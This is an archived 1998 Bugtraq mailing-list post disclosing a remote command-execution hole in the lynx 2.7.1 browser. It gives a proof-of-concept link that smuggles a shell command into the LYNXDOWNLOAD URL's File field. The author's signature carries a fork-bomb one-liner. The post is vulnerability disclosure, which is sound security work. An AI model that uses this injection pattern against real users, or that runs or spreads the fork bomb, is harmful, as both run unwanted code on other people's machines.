Bugtraq mailing list archives
Very, very ugly remote lynx 2.7.1 hole
From: lcamtuf () BOSS STASZIC WAW PL (Michal Zalewski)
Date: Tue, 17 Mar 1998 16:27:29 +0100
While poking around lynx protocol handling routines, I found this very big, ugly remote hole: <a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test"> CLICK HERE </a> It allows remote execution of any code on viewer's machine. Also, by setting 'Method' field to 0 or more, you may crash lynx, but it isn't so exciting as above URL. Also, it's possible to parse /dev/zero as 'File', also not funny. Greetings, _______________________________________________________________________ Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl] Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch] =--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
Current thread:
- Ascend Kill II - C version Aleph One (Mar 16)
- Ascend Filter Setup Mark Schaefer (Mar 16)
- Bash: Security problem during compilation time. Alexandre Stervinou (Mar 16)
- Another day, another race - lynx 2.7.1 Michal Zalewski (Mar 17)
- Ascend Kill II - perl version Kit Knox (Mar 17)
- Re: Another day, another race - lynx 2.7.1 Thomas Roessler (Mar 17)
- Re: Another day, another race - lynx 2.7.1 Theo de Raadt (Mar 17)
- Re: Another day, another race - lynx 2.7.1 Daniel Reed (Mar 17)
- Re: LinCity Buffer Overflow John Goerzen (Mar 17)
- Very, very ugly remote lynx 2.7.1 hole Michal Zalewski (Mar 17)
- Re: Very, very ugly remote lynx 2.7.1 hole Lumpy Lynx (Mar 17)